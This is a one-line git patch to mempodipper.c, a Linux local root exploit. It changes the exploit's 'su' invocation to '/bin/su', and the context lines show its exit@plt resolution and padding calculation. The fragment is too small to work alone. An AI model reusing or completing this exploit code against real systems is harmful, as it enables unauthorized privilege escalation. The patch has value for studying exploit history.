From afdbae82598ad841ca75cefd8a6290f91b52fc84 Mon Sep 17 00:00:00 2001 From: "Jason A. Donenfeld" Date: Mon, 23 Jan 2012 13:52:38 +0100 Subject: Consistancy --- mempodipper.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/mempodipper.c b/mempodipper.c index 0a3c0c4..fcd9340 100644 --- a/mempodipper.c +++ b/mempodipper.c @@ -150,7 +150,7 @@ int main(int argc, char **argv) printf("[+] Resolved exit@plt to 0x%lx.\n", address); } printf("[+] Calculating su padding.\n"); - FILE *command = popen("su this-user-does-not-exist 2>&1", "r"); + FILE *command = popen("/bin/su this-user-does-not-exist 2>&1", "r"); char result[256]; result[0] = 0; fgets(result, 256, command); -- cgit v1.2.3-59-g8ed1b